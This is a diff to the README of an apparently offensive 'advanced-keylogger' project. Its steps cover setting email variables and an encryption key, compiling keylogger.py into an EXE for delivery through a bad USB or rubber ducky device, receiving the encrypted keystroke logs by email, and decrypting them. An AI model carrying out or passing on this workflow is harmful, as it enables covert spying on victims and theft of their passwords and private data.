0xGUZ/advanced-keylogger/README.md

 ### How To  Use:

 1-Change Email variables

+2-Change cryptography key

-2-Change Timers and Tickrate
+3-Change Timers and Tickrate

-3-Compile it into EXE (setup a bad USB or rubber ducky)
+4-Compile keylogger.py into EXE (setup a bad USB or rubber ducky)

+5-Receive encrypted files trough email

+6-Decrypt using decrypt.py

 ### Functionalities:
   -Keylogging